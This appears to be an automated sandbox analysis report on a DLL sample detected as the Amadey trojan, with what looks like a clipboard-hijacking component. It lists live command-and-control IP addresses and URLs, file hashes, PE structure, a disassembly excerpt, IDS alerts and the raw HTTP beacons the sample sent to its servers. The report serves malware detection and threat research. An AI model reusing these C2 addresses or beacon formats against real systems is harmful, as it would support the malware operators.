        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1574266 Sample: D72j5I83wU.dll Startdate: 13/12/2024 Architecture: WINDOWS Score: 92 25 Suricata IDS alerts for network traffic 2->25 27 Found malware configuration 2->27 29 Antivirus detection for URL or domain 2->29 31 3 other signatures 2->31 7 loaddll32.exe 1 2->7         started        process3 process4 9 rundll32.exe 12 7->9         started        12 rundll32.exe 12 7->12         started        15 cmd.exe 1 7->15         started        17 5 other processes 7->17 dnsIp5 33 System process connects to network (likely due to code injection or exploit) 9->33 21 185.81.68.147, 49720, 49727, 80 KLNOPT-ASFI Finland 12->21 23 185.81.68.148, 49726, 49733, 80 KLNOPT-ASFI Finland 12->23 19 rundll32.exe 15->19         started        signatures6 process7

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        D72j5I83wU.dll65%VirustotalBrowse
        D72j5I83wU.dll47%ReversingLabsWin32.Trojan.Amadey
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://185.81.68.148/2100%Avira URL Cloudphishing
        http://185.81.68.147/7vhfjke3/index.phpm100%Avira URL Cloudphishing
        http://185.81.68.147/7vhfjke3/index.phpmUtcs100%Avira URL Cloudphishing
        http://185.81.68.148/R100%Avira URL Cloudphishing
        http://185.81.68.148/8Fvu5jh4DbS/index.phpR100%Avira URL Cloudphishing
        http://185.81.68.148/8Fvu5jh4DbS/index.phpH100%Avira URL Cloudphishing
        http://185.81.68.148/8Fvu5jh4DbS/index.phpF100%Avira URL Cloudphishing
        http://185.81.68.147/7vhfjke3/index.php100%Avira URL Cloudphishing
        http://185.81.68.148/8Fvu5jh4DbS/index.php100%Avira URL Cloudphishing
        http://185.81.68.148/8Fvu5jh4DbS/index.phpJ100%Avira URL Cloudphishing
        http://185.81.68.147/100%Avira URL Cloudphishing
        http://185.81.68.148/8Fvu5jh4DbS/index.php.100%Avira URL Cloudphishing
        NameIPActiveMaliciousAntivirus DetectionReputation
        s-part-0035.t-0009.t-msedge.net
        13.107.246.63
        truefalse
          high
          NameMaliciousAntivirus DetectionReputation
          http://185.81.68.147/7vhfjke3/index.phptrue
          • Avira URL Cloud: phishing
          unknown
          http://185.81.68.148/8Fvu5jh4DbS/index.phptrue
          • Avira URL Cloud: phishing
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://185.81.68.147/7vhfjke3/index.phpmrundll32.exe, 0000000B.00000002.3176052038.0000000002F31000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: phishing
          unknown
          http://185.81.68.147/7vhfjke3/index.phpmUtcsrundll32.exe, 0000000B.00000002.3176052038.0000000002EEA000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: phishing
          unknown
          http://185.81.68.148/2rundll32.exe, 00000007.00000002.3176039165.0000000003453000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: phishing
          unknown
          http://185.81.68.148/Rrundll32.exe, 0000000B.00000002.3176052038.0000000002EEA000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: phishing
          unknown
          http://185.81.68.148/8Fvu5jh4DbS/index.phpRrundll32.exe, 00000007.00000002.3176039165.0000000003453000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: phishing
          unknown
          http://185.81.68.148/8Fvu5jh4DbS/index.phpHrundll32.exe, 00000007.00000002.3176039165.0000000003453000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          unknown
          http://185.81.68.148/8Fvu5jh4DbS/index.phpFrundll32.exe, 0000000B.00000002.3176052038.0000000002EEA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          unknown
          http://185.81.68.148/8Fvu5jh4DbS/index.phpJrundll32.exe, 00000007.00000002.3176039165.0000000003453000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          unknown
          http://185.81.68.147/rundll32.exe, 00000007.00000002.3176039165.0000000003453000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          unknown
          http://185.81.68.148/8Fvu5jh4DbS/index.php.rundll32.exe, 0000000B.00000002.3176052038.0000000002EEA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          185.81.68.147
          unknownFinland
          50108KLNOPT-ASFItrue
          185.81.68.148
          unknownFinland
          50108KLNOPT-ASFItrue
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1574266
          Start date and time:2024-12-13 07:55:28 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 5m 50s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Run name:Run with higher sleep bypass
          Number of analysed new started processes analysed:16
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:D72j5I83wU.dll
          renamed because original name is a hash value
          Original Sample Name:c2f3fbbbe6d5f48a71b6b168b1485866.dll
          Detection:MAL
          Classification:mal92.troj.spyw.evad.winDLL@18/0@0/2
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 8
          • Number of non-executed functions: 28
          Cookbook Comments:
          • Found application associated with file extension: .dll
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtQueryValueKey calls found.
          No simulations
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          185.81.68.147hoPazBDFG9.dllGet hashmaliciousAmadeyBrowse
          • 185.81.68.147/7vhfjke3/index.php?wal=1
          tOuVwTJrau.exeGet hashmaliciousAmadeyBrowse
          • 185.81.68.147/7vhfjke3/index.php
          yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
          • 185.81.68.147/VzCAHn.php?1DC30FADAFF92643095942
          file.exeGet hashmaliciousRedLineBrowse
          • 185.81.68.147/tizhyf/gate.php?0CD020845398340779059
          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
          • 185.81.68.147/tizhyf/gate.php?2DB3A69DE7692371543510
          185.81.68.148hoPazBDFG9.dllGet hashmaliciousAmadeyBrowse
          • 185.81.68.148/8Fvu5jh4DbS/index.php?wal=1
          tOuVwTJrau.exeGet hashmaliciousAmadeyBrowse
          • 185.81.68.148/8Fvu5jh4DbS/index.php
          yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
          • 185.81.68.148/8Fvu5jh4DbS/index.php
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          s-part-0035.t-0009.t-msedge.netfile.exeGet hashmaliciousUnknownBrowse
          • 13.107.246.63
          file.exeGet hashmaliciousStealcBrowse
          • 13.107.246.63
          CMR ART009.docxGet hashmaliciousUnknownBrowse
          • 13.107.246.63
          file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
          • 13.107.246.63
          RFQ3978 39793980.pdf.exeGet hashmaliciousFormBookBrowse
          • 13.107.246.63
          TKuVlZfZngP6kV3.exeGet hashmaliciousFormBookBrowse
          • 13.107.246.63
          RFQ3978 39793980.pdf.exeGet hashmaliciousFormBookBrowse
          • 13.107.246.63
          SwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
          • 13.107.246.63
          original.emlGet hashmaliciousUnknownBrowse
          • 13.107.246.63
          file.exeGet hashmaliciousUnknownBrowse
          • 13.107.246.63
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          KLNOPT-ASFIhoPazBDFG9.dllGet hashmaliciousAmadeyBrowse
          • 185.81.68.148
          tOuVwTJrau.exeGet hashmaliciousAmadeyBrowse
          • 185.81.68.148
          eHCgK6fZc2.exeGet hashmaliciousRedLineBrowse
          • 185.81.68.147
          yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
          • 185.81.68.148
          file.exeGet hashmaliciousRedLineBrowse
          • 185.81.68.147
          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
          • 185.81.68.147
          tjpq0h4wEH.exeGet hashmaliciousRedLineBrowse
          • 185.81.68.147
          file.exeGet hashmaliciousRedLineBrowse
          • 185.81.68.115
          file.exeGet hashmaliciousRedLineBrowse
          • 185.81.68.115
          KLNOPT-ASFIhoPazBDFG9.dllGet hashmaliciousAmadeyBrowse
          • 185.81.68.148
          tOuVwTJrau.exeGet hashmaliciousAmadeyBrowse
          • 185.81.68.148
          eHCgK6fZc2.exeGet hashmaliciousRedLineBrowse
          • 185.81.68.147
          yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
          • 185.81.68.148
          file.exeGet hashmaliciousRedLineBrowse
          • 185.81.68.147
          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
          • 185.81.68.147
          tjpq0h4wEH.exeGet hashmaliciousRedLineBrowse
          • 185.81.68.147
          file.exeGet hashmaliciousRedLineBrowse
          • 185.81.68.115
          file.exeGet hashmaliciousRedLineBrowse
          • 185.81.68.115
          No context
          No context
          No created / dropped files found
          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Entropy (8bit):6.36076412023942
          TrID:
          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
          • Generic Win/DOS Executable (2004/3) 0.20%
          • DOS Executable Generic (2002/1) 0.20%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:D72j5I83wU.dll
          File size:126'976 bytes
          MD5:c2f3fbbbe6d5f48a71b6b168b1485866
          SHA1:1cd56cfc2dc07880b65bd8a1f5b7147633f5d553
          SHA256:c7ed512058bc924045144daa16701da10f244ac12a5ea2de901e59dce6470839
          SHA512:e211f18c2850987529336e0d20aa894533c1f6a8ae6745e320fd394a9481d3a956c719ac29627afd783e36e5429c0325b98e60aee2a830e75323c276c72f845a
          SSDEEP:3072:Vdu5ZXB8ZuzQT7SgmME8Yn/YoZ3SNqpidU1epf:WjGymSg7E8Y3Z3AdUwpf
          TLSH:2BC34B213496C031D66D567E18A8ABF487BD6810DFB00DD77B840E7B8E642D2EE34D7A
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........P............................................................................@.......@.......@.~.....@.......Rich...........
          Icon Hash:7ae282899bbab082
          Entrypoint:0x10007062
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x10000000
          Subsystem:windows gui
          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
          Time Stamp:0x675A9684 [Thu Dec 12 07:53:40 2024 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:6
          OS Version Minor:0
          File Version Major:6
          File Version Minor:0
          Subsystem Version Major:6
          Subsystem Version Minor:0
          Import Hash:fdb088ba51afbf555d7a0f495212d8f1
          Instruction
          push ebp
          mov ebp, esp
          cmp dword ptr [ebp+0Ch], 01h
          jne 00007F53FC835347h
          call 00007F53FC83571Ah
          push dword ptr [ebp+10h]
          push dword ptr [ebp+0Ch]
          push dword ptr [ebp+08h]
          call 00007F53FC8351F3h
          add esp, 0Ch
          pop ebp
          retn 000Ch
          jmp 00007F53FC839062h
          push ebp
          mov ebp, esp
          sub esp, 0Ch
          lea ecx, dword ptr [ebp-0Ch]
          call 00007F53FC8348F5h
          push 1001C6E0h
          lea eax, dword ptr [ebp-0Ch]
          push eax
          call 00007F53FC835DADh
          int3
          push ebp
          mov ebp, esp
          and dword ptr [1001F708h], 00000000h
          sub esp, 24h
          or dword ptr [1001E00Ch], 01h
          push 0000000Ah
          call dword ptr [10016050h]
          test eax, eax
          je 00007F53FC8354EFh
          and dword ptr [ebp-10h], 00000000h
          xor eax, eax
          push ebx
          push esi
          push edi
          xor ecx, ecx
          lea edi, dword ptr [ebp-24h]
          push ebx
          cpuid
          mov esi, ebx
          pop ebx
          mov dword ptr [edi], eax
          mov dword ptr [edi+04h], esi
          mov dword ptr [edi+08h], ecx
          xor ecx, ecx
          mov dword ptr [edi+0Ch], edx
          mov eax, dword ptr [ebp-24h]
          mov edi, dword ptr [ebp-1Ch]
          mov dword ptr [ebp-0Ch], eax
          xor edi, 6C65746Eh
          mov eax, dword ptr [ebp-18h]
          xor eax, 49656E69h
          mov dword ptr [ebp-08h], eax
          mov eax, dword ptr [ebp-20h]
          xor eax, 756E6547h
          mov dword ptr [ebp-04h], eax
          xor eax, eax
          inc eax
          push ebx
          cpuid
          mov esi, ebx
          pop ebx
          lea ebx, dword ptr [ebp-24h]
          mov dword ptr [ebx], eax
          mov eax, dword ptr [ebp-04h]
          mov dword ptr [ebx+04h], esi
          or eax, edi
          or eax, dword ptr [ebp-08h]
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x1cd100x9c.rdata
          IMAGE_DIRECTORY_ENTRY_IMPORT0x1cdac0x50.rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x200000xf8.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x210000x1af8.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0x1bb840x38.rdata
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1bbc00x40.rdata
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x160000x14c.rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x143060x1440060ab5dc3d05117ecdfe5887a3e8a7c70False0.5100188078703703data6.54336981394925IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rdata0x160000x752a0x760008220ccdb3fd3e6b2a37ef117d10551bFalse0.4294226694915254data5.16092989937922IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data0x1e0000x1fec0x1400070ceab71158e4b98b9fbb2974a658d3False0.094140625data1.5445177251659354IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .rsrc0x200000xf80x2009f59a1f7f3b6dfefbfe8605086b5888eFalse0.333984375data2.5080557656497993IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc0x210000x1af80x1c00f0da6f5f3bd34741cc0954192c9cb82cFalse0.7540457589285714data6.518393643652914IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
          NameRVASizeTypeLanguageCountryZLIB Complexity
          RT_MANIFEST0x200600x91XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.8689655172413793
          DLLImport
          KERNEL32.dllGlobalAlloc, GlobalLock, GlobalUnlock, WideCharToMultiByte, Sleep, WriteConsoleW, CloseHandle, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, SetStdHandle, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, RaiseException, InterlockedFlushSList, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetProcessHeap, GetStdHandle, GetFileType, GetStringTypeW, DecodePointer
          USER32.dllEmptyClipboard, SetClipboardData, CloseClipboard, GetClipboardData, OpenClipboard
          WININET.dllInternetOpenW, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile, InternetCloseHandle
          NameOrdinalAddress
          ??4CClipperDLL@@QAEAAV0@$$QAV0@@Z10x10001d60
          ??4CClipperDLL@@QAEAAV0@ABV0@@Z20x10001d60
          Main30x100059a0
          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States
          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
          2024-12-13T07:56:37.610787+01002856151ETPRO MALWARE Amadey CnC Activity M71192.168.2.1049726185.81.68.14880TCP
          2024-12-13T07:56:40.220798+01002856151ETPRO MALWARE Amadey CnC Activity M71192.168.2.1049733185.81.68.14880TCP
          TimestampSource PortDest PortSource IPDest IP
          Dec 13, 2024 07:56:34.548268080 CET4972080192.168.2.10185.81.68.147
          Dec 13, 2024 07:56:34.667948961 CET8049720185.81.68.147192.168.2.10
          Dec 13, 2024 07:56:34.668029070 CET4972080192.168.2.10185.81.68.147
          Dec 13, 2024 07:56:34.668230057 CET4972080192.168.2.10185.81.68.147
          Dec 13, 2024 07:56:34.789043903 CET8049720185.81.68.147192.168.2.10
          Dec 13, 2024 07:56:36.079030991 CET8049720185.81.68.147192.168.2.10
          Dec 13, 2024 07:56:36.079087973 CET4972080192.168.2.10185.81.68.147
          Dec 13, 2024 07:56:36.082289934 CET4972680192.168.2.10185.81.68.148
          Dec 13, 2024 07:56:36.202094078 CET8049726185.81.68.148192.168.2.10
          Dec 13, 2024 07:56:36.202202082 CET4972680192.168.2.10185.81.68.148
          Dec 13, 2024 07:56:36.202471972 CET4972680192.168.2.10185.81.68.148
          Dec 13, 2024 07:56:36.322279930 CET8049726185.81.68.148192.168.2.10
          Dec 13, 2024 07:56:37.179600954 CET4972780192.168.2.10185.81.68.147
          Dec 13, 2024 07:56:37.301012039 CET8049727185.81.68.147192.168.2.10
          Dec 13, 2024 07:56:37.301105976 CET4972780192.168.2.10185.81.68.147
          Dec 13, 2024 07:56:37.301306009 CET4972780192.168.2.10185.81.68.147
          Dec 13, 2024 07:56:37.420912027 CET8049727185.81.68.147192.168.2.10
          Dec 13, 2024 07:56:37.610637903 CET8049726185.81.68.148192.168.2.10
          Dec 13, 2024 07:56:37.610786915 CET4972680192.168.2.10185.81.68.148
          Dec 13, 2024 07:56:38.691873074 CET8049727185.81.68.147192.168.2.10
          Dec 13, 2024 07:56:38.692049980 CET4972780192.168.2.10185.81.68.147
          Dec 13, 2024 07:56:38.694798946 CET4973380192.168.2.10185.81.68.148
          Dec 13, 2024 07:56:38.814544916 CET8049733185.81.68.148192.168.2.10
          Dec 13, 2024 07:56:38.814677000 CET4973380192.168.2.10185.81.68.148
          Dec 13, 2024 07:56:38.832393885 CET4973380192.168.2.10185.81.68.148
          Dec 13, 2024 07:56:38.952199936 CET8049733185.81.68.148192.168.2.10
          Dec 13, 2024 07:56:40.220700979 CET8049733185.81.68.148192.168.2.10
          Dec 13, 2024 07:56:40.220798016 CET4973380192.168.2.10185.81.68.148
          Dec 13, 2024 07:56:41.077640057 CET8049720185.81.68.147192.168.2.10
          Dec 13, 2024 07:56:41.077738047 CET4972080192.168.2.10185.81.68.147
          Dec 13, 2024 07:56:42.609781027 CET8049726185.81.68.148192.168.2.10
          Dec 13, 2024 07:56:42.610193014 CET4972680192.168.2.10185.81.68.148
          Dec 13, 2024 07:56:43.688345909 CET8049727185.81.68.147192.168.2.10
          Dec 13, 2024 07:56:43.688453913 CET4972780192.168.2.10185.81.68.147
          Dec 13, 2024 07:56:45.219563961 CET8049733185.81.68.148192.168.2.10
          Dec 13, 2024 07:56:45.219628096 CET4973380192.168.2.10185.81.68.148
          Dec 13, 2024 07:58:24.511985064 CET4972080192.168.2.10185.81.68.147
          Dec 13, 2024 07:58:24.512037039 CET4972680192.168.2.10185.81.68.148
          Dec 13, 2024 07:58:24.824276924 CET4972080192.168.2.10185.81.68.147
          Dec 13, 2024 07:58:24.839687109 CET4972680192.168.2.10185.81.68.148
          Dec 13, 2024 07:58:25.433484077 CET4972080192.168.2.10185.81.68.147
          Dec 13, 2024 07:58:25.480385065 CET4972680192.168.2.10185.81.68.148
          Dec 13, 2024 07:58:26.652271032 CET4972080192.168.2.10185.81.68.147
          Dec 13, 2024 07:58:26.765198946 CET4972680192.168.2.10185.81.68.148
          Dec 13, 2024 07:58:27.126458883 CET4973380192.168.2.10185.81.68.148
          Dec 13, 2024 07:58:27.126553059 CET4972780192.168.2.10185.81.68.147
          Dec 13, 2024 07:58:27.433430910 CET4973380192.168.2.10185.81.68.148
          Dec 13, 2024 07:58:27.464689970 CET4972780192.168.2.10185.81.68.147
          Dec 13, 2024 07:58:28.058532953 CET4973380192.168.2.10185.81.68.148
          Dec 13, 2024 07:58:28.136555910 CET4972780192.168.2.10185.81.68.147
          Dec 13, 2024 07:58:29.089698076 CET4972080192.168.2.10185.81.68.147
          Dec 13, 2024 07:58:29.292851925 CET4973380192.168.2.10185.81.68.148
          Dec 13, 2024 07:58:29.324090958 CET4972680192.168.2.10185.81.68.148
          Dec 13, 2024 07:58:29.480312109 CET4972780192.168.2.10185.81.68.147
          Dec 13, 2024 07:58:31.745951891 CET4973380192.168.2.10185.81.68.148
          Dec 13, 2024 07:58:32.152317047 CET4972780192.168.2.10185.81.68.147
          Dec 13, 2024 07:58:33.964689016 CET4972080192.168.2.10185.81.68.147
          Dec 13, 2024 07:58:34.418349981 CET4972680192.168.2.10185.81.68.148
          Dec 13, 2024 07:58:36.636746883 CET4973380192.168.2.10185.81.68.148
          Dec 13, 2024 07:58:37.480428934 CET4972780192.168.2.10185.81.68.147
          Dec 13, 2024 07:58:43.699106932 CET4972080192.168.2.10185.81.68.147
          Dec 13, 2024 07:58:44.605370045 CET4972680192.168.2.10185.81.68.148
          Dec 13, 2024 07:58:46.402229071 CET4973380192.168.2.10185.81.68.148
          Dec 13, 2024 07:58:48.136671066 CET4972780192.168.2.10185.81.68.147
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Dec 13, 2024 07:56:25.984850883 CET1.1.1.1192.168.2.100x4a7bNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
          Dec 13, 2024 07:56:25.984850883 CET1.1.1.1192.168.2.100x4a7bNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
          • 185.81.68.147
          • 185.81.68.148
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.1049720185.81.68.147808076C:\Windows\SysWOW64\rundll32.exe
          TimestampBytes transferredDirectionData
          Dec 13, 2024 07:56:34.668230057 CET156OUTPOST /7vhfjke3/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 185.81.68.147
          Content-Length: 5
          Cache-Control: no-cache
          Data Raw: 77 6c 74 3d 31
          Data Ascii: wlt=1
          Dec 13, 2024 07:56:36.079030991 CET711INHTTP/1.1 200 OK
          Date: Fri, 13 Dec 2024 14:56:35 GMT
          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
          X-Powered-By: PHP/8.2.12
          Content-Length: 512
          Content-Type: text/html; charset=UTF-8
          Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED]
          Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.1049726185.81.68.148808076C:\Windows\SysWOW64\rundll32.exe
          TimestampBytes transferredDirectionData
          Dec 13, 2024 07:56:36.202471972 CET159OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 185.81.68.148
          Content-Length: 5
          Cache-Control: no-cache
          Data Raw: 77 6c 74 3d 31
          Data Ascii: wlt=1
          Dec 13, 2024 07:56:37.610637903 CET711INHTTP/1.1 200 OK
          Date: Fri, 13 Dec 2024 14:56:36 GMT
          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
          X-Powered-By: PHP/8.2.12
          Content-Length: 512
          Content-Type: text/html; charset=UTF-8
          Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED]
